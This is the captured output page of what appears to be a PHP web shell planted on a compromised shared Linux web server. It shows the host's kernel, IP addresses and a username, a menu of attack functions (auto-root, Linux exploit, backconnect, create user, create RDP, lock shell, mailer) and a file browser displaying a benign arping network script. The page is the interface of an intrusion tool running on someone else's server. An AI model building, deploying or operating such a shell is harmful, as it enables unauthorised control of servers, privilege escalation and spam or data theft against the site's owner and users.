Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
arping /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
arping-scan-net.sh
1.63
KB
-rwxr-xr-x
arping.default
357
B
-rw-r--r--
arping.if-up
610
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : arping.if-up
#!/bin/sh set -e if [ "${IF_ADDRESS}" = "" ] ; then exit 0 fi . /lib/lsb/init-functions IPUP=0 DOWN=0 if [ -f /etc/default/arping ] ; then . /etc/default/arping fi if [ $IPUP = 0 ]; then exit 0 fi log_action_begin_msg "Using arping to check duplicity of ${IF_ADDRESS}" if arping -c 1 -d -I ${IFACE} ${IF_ADDRESS} > /dev/null ; then if [ $DOWN = 1 ]; then ifconfig ${IFACE} down msg="Bringing ${IFACE} down. " fi msg=${msg}"Another computer is already using ${IF_ADDRESS}" status=1 else msg="No duplicates found" status=0 fi log_action_end_msg ${status} "${msg}" [ ${status} = 0 ]
Close